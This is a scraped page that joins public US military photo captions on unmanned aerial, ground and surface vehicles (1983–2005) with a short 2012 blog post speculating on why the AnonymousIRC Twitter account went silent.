a demonstration at Indian Springs Auxiliary Field, N.V., on Dec. 18, 2004.
The U.S. military uses the four-foot-long UAV as a forward observer to monitor
enemy concentrations, vehicle and personnel movement, buildings and terrain
in Iraq. (USAF Photo by Tech. Sgt. Kevin J.Gruenwald) (Released). Date Shot:
12/18/2004 [Engine and propeller unit is rotated 90-degrees for service.]

[Image]

Mark LaVille, the Scan Eagle Project manager from Boeing Corporation, and
Brett Kelley, a support engineer with the Insitu Group also from Boeing,
uses an electronic blower to cool the engine of a Scan Eagle unmanned aerial
vehicle during an urban warfare exercise at Indian Springs Auxiliary Air
Field, Nev., on May 4, 2005. Scan Eagle flies at low altitudes while taking
video surveillance and it feeds images directly to security forces personnel
in the field. (U.S. Air Force photo by Master Sgt. Robert W. Valenca) (Released).
Date Shot: 5/4/2005[Image]

U.S. Air Force maintenance personnel prepare to push Global Hawk Air Vehicle
Number 3 (AV-3) into its hanger after its 400th mission at an undisclosed
location in support of Operation Iraqi Freedom on Nov. 8, 2004. The Global
Hawk is an unmanned aerial vehicle designed for surveillance and reconnaissance.
(USAF Photo by Tech. Sgt. Erik Gudmundson) (Released). Date Shot: 11/8/2004[Image]

An AGM-114 Hellfire missile hung on the rail of an US Air Force (USAF) MQ-1L
Predator Unmanned Aerial Vehicle (UAV) is inscribed with, “IN MEMORY OF HONORABLE
RONALD REAGAN.” Photographer’s Name: TSGT SCOTT REED, USAF. Date Shot: 6/10/2004[Image]

Tracked and wheeled versions of the Gladiator Tactical Unmanned Ground Vehicles
(TUGV) take a forward position to determine security of the area. The Gladiators
are taking part in a live fire exercise with 1st Battalion, 2nd Marines (1/2),
Bravo Company (B CO), Marine Corps Base (MCB) Camp Lejeune, North Carolina
(NC), at Range 400 aboard Marine Air Ground Task Force Training Command
(MAGTF-TC), Twentynine Palms, California (CA). Photographer’s Name: LCPL
PATRICK GREEN, USMC. Date Shot: 1/14/2004[Image]

Lt. Col. George Biondi, Director of Operations for the 82nd Aerial Targets
Squadron, Tyndall Air Force Base, Florida, flies this QF-4 “Rhino” as a safety
chase on the wing of a remote-controlled unmanned QF-4 “Rhino” full-scale
aerial target drone after a Combat Archer Air-to-Air Weapons System Evaluation
Program mission over the Gulf of Mexico. The QF-4 Phantom II, affectionately
known as the “Rhino”, is used as a threat-representative unmanned target
for live-fire test and evaluation missions. It maintains the basic flight
envelope capabilities of the original F-4, and can also be flown manned for
workup and remote controller training missions. United States Air Force QF-4′s
are flown by the 82nd Aerial Targets Squadron from Tyndall Air Force Base,
Florida and Holloman Air Force Base, New Mexico. (U.S. Air Force photo Tech.
Sgt. Michael Ammons) (Released). Date Shot: 9/16/2003[Image]

A VMU-2′s Unmanned Air Vehicle (UAV) is ready for launch off a Pneumatic
Launcher on the desert floor. Photographer’s Name: LCPL RICHARD W. COURT,
USAF. Date Shot: 3/9/2003[Image]

Chief of Naval Operations (CNO) Admiral Vern Clark listens to Steve Castelin
of NAVSEA Coastal Systems Station, as he talks about the future of unmanned
aerial vehicles (UAV) such as the Blue Fin currently displayed on Nov. 26,
2002. The CNO is in Panama City, Fla., to see new technology hardware and
to visit with local area community leaders. (U.S. Navy photo by Chief
Photographer’s Mate Johnny Bivera) (RELEASED). Date Shot: 11/26/2002[Image]

A RQ-1L Predator UAV (Unmanned Aerial Vehicle) from the 57th Wing Operations
Group, Nellis AFB, NV sits in a maintenance bunker at a forward operating
airbase in the ENDURING FREEDOM area. The Predator is a medium-altitude,
long-endurance, unmanned aerial vehicle system used for reconnaissance,
surveillance and target acquisition and is in Afghanistan in direct support
of Operation ENDURING FREEDOM. Photographer’s Name: CWO2 William D. Crow,
USMC. Date Shot: 2/14/2002[Image]

Operations Specialist 1st Class Guy Hurkmans of Escanaba, Mich., assigned
to Destroyer Squadron 50 (DESRON50), Naval Support Activity, Bahrain manually
launches an Unmanned Air Vehicle (UAV) during a flight test that is being
conducted in support of Maritime Interception Operations (MIO) on Jan. 6,
2002. (U.S. Navy photo by Photographer’s Mate 1st Class Ted Banks) (Released).
Date Shot: 1/6/2002[Image]

Army personnel walkout and position the Hunter UAV (Unmanned Aerial Vehicle)
for takeoff at Petrovec Airfield, Skopje, Macedonia, in support of TASK FORCE
HARVEST. The role of TASK FORCE HARVEST is to collect arms and ammunition
voluntarily turned over by ethnic Albanian insurgents, and thereby helps
to build confidence in the broader peace process suggested by the President
of former Yugoslav Republic of Macedonia. The Hunter UAV plays a key role
in helping NATO troops by surveying and looking for any changes in the local
area that might hinder the peacekeeping mission. Photographer’s Name: SSGT
JOCELYN M. BROUSSARD, USAF. Date Shot: 9/13/2001[Image]

The new Dragon Eye Unmanned Arial Reconnaissance Vehicle sits partially
disassembled prior to a demonstration given to commanders during Kernal Blitz
Experimental aboard Camp Pendleton, Calif., on June 23, 2001. The Dragon
Eye is controlled line of site via computer and can transmit real time video
imagery back to the operator. (U.S. Marine Corps photo by Sgt. John Vannucci)
(Released) Date Shot: 6/23/2001[Image]

The Global Hawk heads back towards its hanger after doing preflight checks
before going on a twenty four hour mission out of Edinburgh Air Force Base
in Adelaide, South Australia, in support of Exercise Tandem Thrust. The Global
Hawk is a jet powered Unmanned Aerial Vehicle (UAV) designed as a Reconnaissance
and Surveillance vehicle with a wing span equal to a Boeing 737, flying at
altitudes of up to 65,000 feet for more than 24 hours and capable of searching
an area of more than 40,000 square miles. The Global Hawk is deployed to
Australia from April to June 2001, flying more than a dozen missions. These
missions will include sorties in support of Tandem Thrust as well as maritime,
littoral, land surveillance and stand off reconnaissance capabilities. The
Global Hawk completed its first successful maiden flight in February 1998.
Currently there are five U.S. Air Force Global Hawks which have logged over
60 flights and have clocked more than 600 hours, with it’s biggest challenge
to date the non-stop Trans-Pacific flight from Edwards AFB CA to Edinburgh
AFB South Australia. Exercise Tandem Thrust 2001 is a combined United States
and Australian military training exercise. This biennial exercise is being
held in the vicinity of Shoalwater Bay Training Area, Queensland, Australia.
More than 27,000 Soldiers, Sailors, Airmen and Marines are participating,
with Canadian units taking part as opposing forces. The purpose of Exercise
Tandem Thrust is to train for crisis action planning and execution of contingency
response operations. Photograph CLEARED FOR RELEASE by Lt. Col .Pat Bolibrzuch,
Australian Deployment Commander, Global Hawk Program Office and Wing Commander
Brett Newell, Deputy Director Emerging Systems, Aerospace Development Branch.
U.S. Navy Photo by PH3 J. Smith (Released). Photographer’s Name: PH3 JENNIFER
A. SMITH. Date Shot: 5/13/2001[Image]

The Broad-area Unmanned Responsive Resupply Operations (BURRO) is used in
conjunction with the Slice Multi-Task Boat (only flight deck is seen) for
providing over the horizon sea-based logistics. The BURRO (also known as
the KAMAN K-1200 K-MAX Helicopter) is also used for resupplying ships at
sea. It is currently on the flightdeck of the Slice Boat (Prototype) at Coast
Guard Island in Oakland, California, due to its participation in Fleet Battle
Experiment Echo. Also seen in the frame is a right side front view of the
U.S. Coast Guard High Endurance Cutter, USCGC SHERMAN, (WHEC-720). This mission
is in direct support of Urban Warrior ’99. Photographer’s Name: LCPL Christopher
L. Vallee. Date Shot: 3/19/1999[Image]

The Navtec, Incorporated Owl MKII Unmanned Surface Vehicle (USV) glides stealthly
through the waters of Mile Hammock Bay, New River during a demonstration
to highlight it’s marine reconnaissance capabilities to the Riverine Insertion
Operation Exercise (RIOEX) ’98 participants. The Owl MKII is funded by the
Office of Naval Research (ONR) and is remote-controlled from a small shoreline
control station by Brad Dowling, a Navtec, Inc. electronics engineer, at
Camp Lejeune, North Carolina, during the Riverine Insertion Operation Exercise
(RIOEX) ’98. Photographer’s Name: LCPL T.A. Pope, USMC. Date Shot: 5/14/1998[Image]

The Dragon Drone Unmanned Aerial Vehicle was on display at the MOUT (Military
Operations in Urban Terrain) facility during LOE 1 (Limited Objective Experiment
1). Urban Warrior is the U.S. Marine Corps Warfighting Laboratory’s series
of limited objective experiments examining new urban tactics and experimental
technologies. Photographer’s Name: Sgt. Jason J. Bortz. Date Shot: 1/23/1998[Image]

US Marine Corps Air Ground Combat Center (MCAGCC). A “Night Owl”, or RQ-2A
Pioneer, surveillance Unmanned Aerial Vehicle (UAV) is launched from its
twin rail catapult mounted on a 5-ton truck. This launch is conducted by
the Cherry Point Marine Base, Squadron-2, part of Combined Arms Exercise
(CAX) 5-97 at Airfield Seagle. Photographer’s Name: LCPL E. J. Young. Date
Shot: 4/14/1997[Image]

A close up front view of the fuselage section from the wreckage of a Predator
Unmanned Aerial Vehicle (UAV) laying on a hillside in the Russian sector
of the Multinational Division North (MDN) area of operations. Photographer’s
Name: SSG Edward W. Nino. Date Shot: 10/1/1996[Image]

A civilian contractor tests the unmanned submersible Deep Drone aboard a
US Navy ship. The sonar device is being used during salvage operations for
downed Korean Air Lines Flight 007 (KAL 007). The commercial jet was shot
down by Soviet aircraft over Sakhalin Island in the Sea of Japan on August
30, 1983. All 269 passengers and crewmen were killed. PH1 Fel Barbante, USN

05/14/12

Is AnonymousIRC TangoDown?

IS AnonymousIRC TangoDown

 AnonymousIRC gAtO hAs – been looking for tweets from #anonyonusIRC and nothing – For the last 7 days AnonymousIRC has been off the tweet. Maybe a holiday, maybe busy Twitter Diet:
All we know is that the last tweet was:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

The Message From France To Nicolas Sarkozy: “Casse-Toi Pauv’Con” #Anonymous #RadioLondres #Hadopi #Loppsi #ACTA #CISPA

2:18 PM Sun May 06 2012 · LulzTweeter

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

and the last retweet came @

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Fact: Right now, #Merkel is sitting in her office, getting drunk and saying “France is gone, Greece is lost, where is Keitel?” #Downfall

2:46 PM Sun May 06 2012 · LulzTweeter

  • 141
    RETWEETS
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

So were is AnonymousIRC now- nobody knows all we know is on a nice Sunday afternoon about 1446 they last re-tweeted and left the world. Of source is you check out the twitter search for AnonymousIRC there are lots of mentions but no clue from them. Has another fallen Anonymous hero fallen like SaBu, will they come back again and try to do the same thing that SaBu did. We all await AnonymousIRC an to see what they have to say. -gAtO oUt